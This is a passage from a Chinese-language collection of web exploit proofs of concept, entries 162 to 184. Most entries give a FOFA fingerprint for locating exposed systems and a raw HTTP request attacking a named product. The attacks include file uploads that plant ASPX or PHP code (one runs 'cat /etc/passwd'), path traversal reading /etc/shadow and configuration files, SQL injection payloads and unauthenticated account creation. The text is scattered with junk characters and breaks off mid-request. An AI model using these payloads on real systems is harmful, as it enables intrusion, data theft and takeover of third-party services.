6 W4 L* G( m7 Z<?xml version="1.0" encoding="utf-8"?>
& `, \- I) Y6 w* J$ f5 N: b6 u. N& ^3 _<soap:Envelope xmlns:xsi="
# P8 U4 H) b$ a* E! Whttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema", ^; Z& |- D: k3 M; l, @# M
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">0 g2 [+ X+ H; H, k3 {9 U. e5 F" b% j
<soap:Body>
! |1 ]/ o6 P9 e8 l# g<UploadResume xmlns="http://tempuri.org/">. U5 T- d5 g9 T: L5 ^
<ip>1</ip>
: {7 e8 ~$ Q# g9 l& p<fileName>../../../../dizxdell.aspx</fileName>& z' }1 l1 `' @
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
1 S$ H0 w: I B<tag>3</tag>9 a2 a1 f5 I! u5 B8 e
</UploadResume>
; _! F; g2 [) I7 V( _) m8 J0 Z$ s</soap:Body>, S" p8 o6 w5 _
</soap:Envelope>
# A+ g# k Z' w% i# A) E0 F0 S; c5 a3 I3 Q: y
# x4 t& t/ j. N. m* l$ dhttp://x.x.x.x/dizxdell.aspx# s# c; x7 g; x" K* e
5 x0 `; C8 m" C' f; y3 R+ M
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
+ ~. v; f, \- N6 `& r6 j/ uFOFA: app="和丰山海-数字标牌"
0 p, ?6 g* H- e$ Z% Q( }" \" @POST /QH.aspx HTTP/1.15 B8 c4 V" Z+ N+ m2 F7 j; T
Host: x.x.x.x2 G; ~3 U6 |2 ?1 e) J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0, N7 N& R+ D% J
Connection: close; i6 O( o1 B W* N E
Content-Length: 583
! D) A2 r1 O% K& [5 t fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
* ?9 o. S0 u! A1 _Accept-Encoding: gzip
, j4 p( A8 B- t8 W% Q5 U4 x* [5 M
------WebKitFormBoundaryeegvclmyurlotuey
8 @/ F* J* S& i: `. d" u5 V+ YContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"' n8 T* I8 q* a+ ^2 x4 J! i/ L$ P
Content-Type: application/octet-stream
6 Z: L, v, k7 z& e' G) `* a9 q9 m' f! J# z! Q
<% response.write("ujidwqfuuqjalgkvrpqy") %>0 V* C( |# M( l8 [6 S# ^; t
------WebKitFormBoundaryeegvclmyurlotuey/ j0 C4 y! I4 x. U* B
Content-Disposition: form-data; name="action"
! R5 @) j" @* ^- F; H6 R
0 k) n- ^- w. j: N( X; I, I5 T$ j7 wupload; Z8 r6 Z$ V; v! l+ u/ r+ X
------WebKitFormBoundaryeegvclmyurlotuey
" R- A" j: q5 kContent-Disposition: form-data; name="responderId") ~6 G/ C+ J$ n
1 Q9 q0 r" C9 o4 kResourceNewResponder
% f. b' S s% `8 t- T4 E- n------WebKitFormBoundaryeegvclmyurlotuey) p1 n) ?7 p( w0 w' \
Content-Disposition: form-data; name="remotePath"
6 R" `6 g N$ a+ }2 s* R+ K% R: m2 M- L3 E; g4 g. A9 k8 _
/opt/resources
/ Q1 z; j5 g* R------WebKitFormBoundaryeegvclmyurlotuey--
$ R f% n- J$ t3 H# `, r
0 i; }/ U) t1 T, k
0 `/ e C5 v) W7 mhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx6 [5 M7 G5 r' i9 h- s+ O9 w9 I
1 o5 U% C8 v/ }163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
( Y9 I1 u3 |9 F8 lFOFA: icon_hash="-795291075"/ H4 Z, H2 \, O' M2 m
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
! x7 H8 H M: f7 o/ b% xHost: x.x.x.x
# K+ r/ ~+ w% c* H9 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36- K" q$ ?) f) x
Connection: close; o; ^3 ]2 L4 z( e8 J
Content-Length: 293" ]2 o' b4 ]4 H9 n2 u
Accept: */*- u& z' F0 i/ L0 \# g3 t
Accept-Encoding: gzip, deflate
9 k4 Z8 @. x. n# t; GAccept-Language: zh-CN,zh;q=0.9* [' |" D6 J4 ?: }9 `: q- c2 T! f
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod9 z7 j& R; u4 [; l5 Y
1 u- K: t8 l; ?" |------iiqvnofupvhdyrcoqyuujyetjvqgocod9 k. ?4 Z8 m2 X" |' ?: `' l0 i
Content-Disposition: form-data; name="name"' W2 O, f& U8 \) Q; x$ i* Q
: b. w" c3 |+ @ R c! {1.php
3 z2 r9 Z0 o3 G------iiqvnofupvhdyrcoqyuujyetjvqgocod
2 @" P( [2 L$ t" \9 L6 M3 BContent-Disposition: form-data; name="upfile"; filename="1.php"& i) C. ?& f. E/ V: E
Content-Type: image/jpeg4 B9 ]- l( f+ | h! p, J
3 g. `1 h2 v$ g
rvjhvbhwwuooyiioxega
5 T' O+ X/ T2 Y/ t( \& z- X' h/ G, b------iiqvnofupvhdyrcoqyuujyetjvqgocod--
; _% n8 P5 L0 S+ Y- B
2 Q! x& p, ?# \8 z" ~4 m' g R# v. Z$ s o, M! J" A8 f* y+ P: K; L/ t
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
$ m' [3 P S* D2 P* m: r; AFOFA: title="智慧综合管理平台登入"& ^9 f1 G. s" X& ^- p+ D" d
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1- i3 I/ p$ v A- }* Z! \
Host: x.x.x.x7 y# Y4 }, J7 h/ R; G7 y9 }+ y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
$ k) ~) N2 V4 ~# K# a/ EContent-Length: 288
0 O3 [8 E1 b$ G& cAccept: application/json, text/javascript, */*; q=0.01( `; i& K$ u1 W. ^1 k- ~- m5 E$ Q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
! ?( Q; s$ m% n$ d) eConnection: close: L2 Z+ q" T* H' a
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
& ?, W3 \ f; ]8 Y; u) yX-Requested-With: XMLHttpRequest) W! w* l4 V: Y ]" z: l
Accept-Encoding: gzip& J2 R5 f, s1 D1 v1 o- h
. p9 Q) {2 k0 z/ y------dqdaieopnozbkapjacdbdthlvtlyl7 W& ?% ^5 y5 y, @ T1 }2 J B
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"2 ?4 g/ ?- ~2 w$ Z) L6 e
Content-Type: image/jpeg6 }' A4 m. o$ P0 Y& J- `
7 l- }' b( Z, O
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>7 \5 T( f6 j4 L' }6 q$ ?3 H+ W4 _2 b
------dqdaieopnozbkapjacdbdthlvtlyl--% S! d# z# |# v8 i& g
8 ~5 m L1 X3 p. y n) S: r$ o5 o" |
6 m8 Z% ]2 q8 C5 N) Q1 {/ Whttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx( J' M* z" ?' t% F# L& j
3 B# g. r, r; W9 r- u3 ]8 u# j3 C) g165. OrangeHRM 3.3.3 SQL 注入
" Q( v$ v" Q& ^% ECVE-2024-364280 N" h0 [" K u" |
FOFA: app="OrangeHRM-产品"7 l) C$ ?( J" Z" h+ L$ P
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))- h" w! d7 K: E2 Y& k$ l
) L; y9 } V1 g. _7 ~, `+ ~7 ^
: e' S8 D. C) x0 ]. H* h4 K/ L% V/ X" h166. 中成科信票务管理平台SeatMapHandler SQL注入
3 t+ Y) Q- b: QFOFA:body="技术支持:北京中成科信科技发展有限公司"
# ^8 I. H( Y$ k- M2 b1 IPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
- j5 o. z3 K8 V8 x6 z; eHost:
4 i* _1 N, \8 _5 D# sPragma: no-cache
+ Y* | h( w6 u& N Q' aCache-Control: no-cache
3 X* c4 w) D. n( a1 R& ZUpgrade-Insecure-Requests: 1/ Z1 ]1 Y0 u0 M- A2 K/ I6 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36! C6 w. O) j6 o; r& O$ ?3 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 a% m9 Y5 X. g4 NAccept-Encoding: gzip, deflate, `7 j, W7 u' z$ Y' }) Z
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 l5 Q0 j @$ G5 O# S; y1 m$ ?1 ICookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE6 z& b, o/ T. U( t, i& R
Connection: close$ J8 G2 r8 k# A$ p+ u8 \8 `
Content-Type: application/x-www-form-urlencoded4 |5 @9 }2 P# v. ~
Content-Length: 89( M5 k* |" [) k
, N0 M) i& F/ E8 Q3 A
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
. y! R) w3 H& O$ {0 {+ p( A7 L2 V$ s% r$ n% R2 Q2 Z/ T' F
# D3 u' G1 d5 p: Z% G167. 精益价值管理系统 DownLoad.aspx任意文件读取( m5 Y5 u% G" O8 `
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
% ?' \, `$ t5 d5 P8 m/ Q- ?8 VGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
P, c* b3 y* s+ z# [Host:
9 K- l }9 m8 h, M% @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 ~( D! V; h% r+ o) dContent-Type: application/x-www-form-urlencoded
- A' F3 l P. V2 ]# o9 U) yAccept-Encoding: gzip, deflate
6 {. @# `* M: }+ UAccept: */*
/ k* o% O8 |* x% fConnection: keep-alive
- y4 ?( m# G( R' u
+ i6 _7 ~( ^; v$ g
* k7 I |* G. \' G6 k( _# L) T168. 宏景EHR OutputCode 任意文件读取
# q7 L& ]+ K0 |: j' | b( {9 J4 M8 Z. b# n+ LFOFA:app="HJSOFT-HCM"
" \- O" j9 h4 OGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
% L, o |! `; D; I8 l# a- EHost: your-ip
* m, F9 E! m* U- s7 n4 p' XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.364 a" O E2 w+ j' } q
Content-Type: application/x-www-form-urlencoded% `, X8 N4 P3 |1 V7 o) w6 a
Connection: close8 m9 G, c! z; j+ I" s2 ?6 l
" e. o4 p2 b# E3 `; x, C0 x
2 N/ y D1 f. [& E- V' L- W7 a" j/ P: X# ^& ^
169. 宏景EHR downlawbase SQL注入
# V* Z5 i) }& ?8 P8 uFOFA:app="HJSOFT-HCM"
' ?8 e3 D8 a$ X; t9 @0 g8 \: {GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1# d, I* q6 }1 Z9 p" n& Z5 G' n
Host: your-ip
, M* w1 r* @7 h$ o" rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 u2 H* C" R: ~2 @* N1 I9 D+ O
Accept: */*/ F8 ]1 z9 g5 Z
Accept-Encoding: gzip, deflate- R) d* c- ^1 O' l: V4 J) G' P
Connection: close' A: `& N5 z- H3 _7 `, p' ?- u
, j; d: _/ u2 o$ H% t6 d+ k
; y, ]3 y- R7 j" k/ P2 o- T
6 q) f7 i% i7 o/ Z/ k$ b9 ?5 y$ O170. 宏景EHR DisplayExcelCustomReport 任意文件读取
1 I' V+ V# U8 O$ e) TFOFA:body="/general/sys/hjaxmanage.js"2 s5 F# M4 q2 v# |5 C5 P3 z& R
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
+ a. C. v* k `, yHost: balalanengliang7 s; Q6 i! Z# T! J: A }
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! z# b7 z4 Q' q- D1 U4 r$ h: ~Content-Type: application/x-www-form-urlencoded
/ o: S. U! N. U! h% ^: e- j9 K. e, v: r
filename=../webapps/ROOT/WEB-INF/web.xml& ~: y. c' {! v1 l( r
/ g4 e0 ]/ u$ f$ w- `. S3 l7 b3 @) b1 Y1 a' e/ G% Z
171. 通天星CMSV6车载定位监控平台 SQL注入( ?; T; ]/ I1 r% F- Z4 }
FOFA:body="/808gps/"
) I8 F1 Z/ g* Q1 r7 |0 qGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
9 o% k; J; o0 U4 s/ SHost: your-ip* c' p1 F. l% r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
0 X+ k) z5 I4 U8 Z5 F T# }8 X1 GAccept: */** V" E" S6 _7 v! L9 N' v0 z5 i8 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 Y5 s, b0 V3 L# W+ N
Accept-Encoding: gzip, deflate! ^7 J" }3 k, Q2 [; j/ V2 P
Connection: close) q$ c( F4 f3 O0 N! h1 s
$ C6 Z" I7 C2 h1 H0 F, ^5 [
! z/ M" ^( m3 p/ s
! f9 ?$ E- s2 j2 M172. DT-高清车牌识别摄像机任意文件读取
0 G" Q& l# J8 M. B/ rFOFA:app="DT-高清车牌识别摄像机"* R1 T, I2 T6 m( Z' ~+ Y3 i5 l
GET /../../../../etc/passwd HTTP/1.1
+ M; q# J2 k3 zHost: your-ip9 X1 U i+ V5 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 s. U0 f( s' @% ]6 ?6 d# o) V7 VAccept-Encoding: gzip, deflate. [1 T' y$ c5 C& Y9 j; K, h4 J+ U2 _
Accept: */*
4 d H2 V: {% a8 w* gConnection: keep-alive& H u4 f/ Y2 s2 P9 T4 n
- h" d. e- y- ~+ s6 I* @/ _
4 U) H+ _9 c: s1 ^% O" A- ?6 R% h9 {$ w1 ^
173. Check Point 安全网关任意文件读取
( J& ^7 G4 @9 o; o. F3 K6 ~- `CVE-2024-249197 L) ~( p+ _6 |7 G1 B1 k
FOFA:app="Check_Point-SSL-Network-Extender"
( l- t1 j' y3 a5 EPOST /clients/MyCRL HTTP/1.1' E# i' Q2 w6 i% k1 e$ k! H
Host: your-ip1 k1 F+ c: M$ U" g8 j: k) Q5 w
Content-Type: application/x-www-form-urlencoded
1 x5 a, T+ h1 \0 P& V8 f: M$ @* ]8 z% T, N( J& g6 ?; O" a
aCSHELL/../../../../../../../etc/shadow$ o# E; `) r% d! t! V8 ?& _( b6 \: G
/ y* k% ?3 i, }; A1 h
2 x9 c0 }8 o9 k6 n. O* _, D) y6 V- w
+ h0 n" x9 I+ l174. 金和OA C6 FileDownLoad.aspx 任意文件读取
# W7 j; z! x$ Z9 z( [$ EFOFA:app="金和网络-金和OA"
$ b8 u# `! t I6 @0 C( qGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
, b0 f: N% c9 Z$ d1 e; t; O2 ]! v" YHost: your-ip* r9 i& ^$ q8 j H& K5 ^ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
3 o+ j: Z" N7 w. \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 J( x% W/ t( j1 bAccept-Encoding: gzip, deflate, br+ m# r1 _! O* W' u9 r
Accept-Language: zh-CN,zh;q=0.9, ]$ |7 ~% a1 U
Connection: close
: Y" U8 g2 f1 C2 V, F2 H! H/ I. Z& e3 P g* ^: @
, _- J5 u" g( J3 }8 j0 [ m. P/ T) [6 v& {+ u' e5 R9 F
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
) N$ I' a x& R& QFOFA:app="金和网络-金和OA"2 q4 {2 h* D3 X
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1- d7 Z) `1 D4 z+ X$ d8 n2 ?5 I# a8 `
Host:( ?6 s1 C5 v# ~- k9 F# K
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' z! v- C6 U a. T, s( i3 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 @ K/ P, t4 m5 U, f9 cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 D/ T! ^. I& K! c- }. H
Accept-Encoding: gzip, deflate0 l5 W9 x1 f2 s( O/ `, q- s) f! I
Connection: close3 w( }- k: t6 B+ w' J2 v8 j
Upgrade-Insecure-Requests: 17 g# W( `" `+ {4 s6 }8 d
; q9 S4 R' F3 J1 _
3 U! w) c3 j( q/ C% r8 `& Z176. 电信网关配置管理系统 rewrite.php 文件上传/ {5 E( ^0 C0 H8 J( y$ y
FOFA:body="img/login_bg3.png" && body="系统登录"
" M0 R3 q& ]/ j- a' P" `+ S7 APOST /manager/teletext/material/rewrite.php HTTP/1.1& F0 ~) ]# @5 P. v( w
Host: your-ip
7 U, `4 o' m8 J* MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0; T4 K, u6 P! h* u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
) H1 e* T3 @ c5 p* i6 r' DConnection: close
1 H* i) j) Z* N$ B! w3 C4 ~# s. z5 z* L! X
------WebKitFormBoundaryOKldnDPT
* I( t- G k: XContent-Disposition: form-data; name="tmp_name"; filename="test.php"
; `& T- j9 W& G5 wContent-Type: image/png4 o1 G6 C2 q( \1 C( ^
: D' @0 C" u% B8 b2 h' b+ e<?php system("cat /etc/passwd");unlink(__FILE__);?>
$ u# a1 b2 e& V5 i. q+ U------WebKitFormBoundaryOKldnDPT# [4 f) G8 K# U+ G$ [
Content-Disposition: form-data; name="uploadtime"; T9 T2 ]( [& m; |9 R8 X
4 E. n* b/ G' U+ S6 y# c# ~) h8 l
% Z$ v1 ? u# d------WebKitFormBoundaryOKldnDPT--' Z8 H4 N( u1 V2 m
9 Z3 J1 T! l# R
' T9 W5 n3 I$ h X& M8 c( u$ P3 y$ E
177. H3C路由器敏感信息泄露
5 }$ _& T! e) A1 g1 V% |/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
" N2 b. g4 m3 s/userLogin.asp/../actionpolicy_status/../M60.cfg) j0 v, J' _! |* P4 n! w$ L6 K
/userLogin.asp/../actionpolicy_status/../GR8300.cfg. [2 ?2 z9 C$ A
/userLogin.asp/../actionpolicy_status/../GR5200.cfg5 z- V# m5 X2 X, k' R
/userLogin.asp/../actionpolicy_status/../GR3200.cfg7 {2 T0 e2 E; z! W8 e
/userLogin.asp/../actionpolicy_status/../GR2200.cfg2 s! z. @# V$ D8 s9 S
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg$ H! y( J: A% B' T9 {! M; @) _
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
8 V5 F( F, b( M/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
3 B# q0 H" E# u" P/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
3 `2 p6 ?8 c1 G) e/userLogin.asp/../actionpolicy_status/../ER5200.cfg8 {5 X1 d7 I$ v# T; }' e# R& D
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
9 v$ @2 z9 [. j% `' V5 o. y/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg, w% M, q( C- g7 }9 a, A
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
& B8 D8 f; S+ O) d2 d/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg% M+ \& j5 y. y( j: V' I$ [" Z/ H
/userLogin.asp/../actionpolicy_status/../ER3200.cfg5 m: ?) c* a4 D( R0 g, ^' ~+ Z
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
; `8 @! u9 j* E, I/userLogin.asp/../actionpolicy_status/../ER3108G.cfg! J" o4 O7 e) {* m
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg" P# M6 j1 d8 g; c" Q) P
/userLogin.asp/../actionpolicy_status/../ER3100.cfg/ N+ C1 Q3 ?$ W3 G- d1 ~
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
4 P) j2 ]+ D$ ^3 h' Q5 v( b+ z# G3 I6 z! k6 K( {/ y/ ^
% q6 l, t! i' t# ?178. H3C校园网自助服务系统-flexfileupload-任意文件上传+ p; a, F8 Q& \; j7 r% |
FOFA:header="/selfservice"
5 E# ^( W/ b0 i. \7 h. K6 w: R/ M0 x: gPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1* O6 M# ^0 z) ^; `- _
Host:: i( `; H, S. } f1 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 q1 _* z: N. Q2 W9 \& I6 g, y' [& u
Content-Length: 252
3 z. o' r2 c O; s r% h) P' Q7 U- {Accept-Encoding: gzip, deflate
$ S9 m1 i6 D+ s, lConnection: close
3 e$ ^$ A( `; y/ EContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l8 _ p1 {( Y: Z' j+ V0 u
-----------------aqutkea7vvanpqy3rh2l
& X( ^" U9 ^, [7 M5 b) EContent-Disposition: form-data; name="12234.txt"; filename="12234". y' u" I! c: n
Content-Type: application/octet-stream
& N% @ V9 e- @$ h! f4 d7 L! vContent-Length: 255
( Z8 d7 ?2 y# v/ D: z3 }) m- J* O( l2 \8 m. [! J
12234
2 Z9 C) T" F1 H$ ?6 n+ B-----------------aqutkea7vvanpqy3rh2l--* ~$ b v( x. U1 D7 ]
4 }+ J* j- ]) I; M- q( M6 ~& B
# B* [; C$ q* a) ]& q1 f0 rGET /imc/primepush/%2e%2e/flex/12234.txt
3 i S& S9 A, X2 F; y" S5 M
. p" ~- ^" z* U: ]. Y
, P1 M6 N7 C# l6 o179. 建文工程管理系统存在任意文件读取
2 C4 D. G5 i. o) N: @1 HPOST /Common/DownLoad2.aspx HTTP/1.1
$ w" a+ b' ]" x! M* K: Y1 b5 zHost: {{Hostname}}
: z5 b; l. [( RContent-Type: application/x-www-form-urlencoded7 L7 G/ E% {! g n$ X6 w
User-Agent: Mozilla/5.08 a3 r/ W6 R8 R& K& G+ r( R
0 Z2 j! D! B* p8 F( ?path=../log4net.config&Name=
8 }* z1 |0 ?3 O$ t
7 f- J1 q" f" e' I9 u+ }2 }( I0 g
/ q+ l& ?' p& r180. 帮管客 CRM jiliyu SQL注入& ^ B2 k! |3 \( Z5 z" K+ ^
FOFA:app="帮管客-CRM"5 O0 ^8 _$ E& ^& V( @3 C
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
9 H$ n; K' |7 N- Z/ ^Host: your-ip
" |: F; t! s1 V- u, T, jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) K; j/ a8 q: f: {. LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* l" U* \3 m6 o5 \Accept-Encoding: gzip, deflate
$ v; Y6 e3 [' q2 cAccept-Language: zh-CN,zh;q=0.9
2 y `. ]! f bConnection: close
D4 t( m- Z1 c& V% z, N3 c% J4 K4 @) Q# o' J% _; ?* J. L" q
+ X8 ?) G+ n. Y8 \( C9 R, r! Y" U181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入' D, g) h& |' V
FOFA:"PDCA/js/_publicCom.js"2 v! K, u! r/ `) k7 \/ x% A6 V
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1- V# i( B4 i$ ?( V% j. l ]3 H
Host: your-ip6 E1 J4 }8 c6 m1 A/ Y# z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
# U7 h/ G6 n( O6 R7 i5 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# l4 _5 V5 p. d& l: B3 c
Accept-Encoding: gzip, deflate, br
% v) w( `7 N2 s, X$ w$ R& sAccept-Language: zh-CN,zh;q=0.9! M P* S5 s* ]+ m w
Connection: close$ Q9 N& D6 v1 @9 |
Content-Type: application/x-www-form-urlencoded' Y9 ]8 l' R; j$ `
2 E3 B9 z/ D9 L6 g3 Y- W; k. R2 `, ?# p1 B# v9 U
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=200 Y! x# g6 E5 \1 Y: T
. H v5 E* _: Z) S
3 B9 o( q5 |0 H6 Z: G4 M182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建) T8 A8 v; p" }0 z4 D" a
FOFA:"PDCA/js/_publicCom.js"
# s3 W5 T2 U/ a; [POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
+ M' R* i) c I0 w PHost: your-ip4 r/ p* g! t5 a$ @/ W @% j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.364 W0 E/ N0 S) B9 C i$ L6 u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 ~) l% o. N) A1 Z! Z4 N dAccept-Encoding: gzip, deflate, br
2 z, q$ Y& z2 f& Y8 _2 N5 `6 c# Y) i7 jAccept-Language: zh-CN,zh;q=0.91 t! A* i& i3 h' u4 k9 C$ |
Connection: close. M, p& j0 H) _# M" L& \! r% U% ?
Content-Type: application/x-www-form-urlencoded6 A* O0 W9 r+ {8 b; @
. Q+ {$ a: ]; e2 `5 L2 D1 z
# S2 e6 D& ^# E7 I5 V1 V
username=test1234&pwd=test1234&savedays=1 D3 u, t5 i( g" k
3 b/ O2 e# ?4 E" F
8 k5 l* c6 a! A183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
" F* T {2 M' [$ sFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
m/ G! ]2 v, z b. FGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.12 R9 O* G: w/ g
Host: your-ip/ P$ M" c0 N5 F8 ?2 t- t
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
g* o: a- n1 e4 kAccept-Charset: utf-8
' b2 o1 r+ T# z9 S5 f* Q% k/ TAccept-Encoding: gzip, deflate+ u2 ~7 Q9 P; r0 G; m) D* O
Connection: close5 h! Y ]% w. g- B% U
% _6 ?! \) z2 l9 q( }% V' ?1 D; p/ Q! g* ~" r4 s
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加2 k4 F% r$ Z2 P/ I0 W, D
FOFA:server="SunFull-Webs"
/ m# g( K! P- k. [8 E; [; S2 L6 UPOST /soap/AddUser HTTP/1.1: e) K5 r" B! q% d
Host: your-ip& r4 e& V- p s' J5 i
Accept-Encoding: gzip, deflate
9 @. r! Q4 {( |6 o: eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
4 ?% [& d. K, vAccept: application/xml, text/xml, */*; q=0.014 i3 N' y9 ]* O: j D1 H4 A
Content-Type: text/xml; charset=utf-8
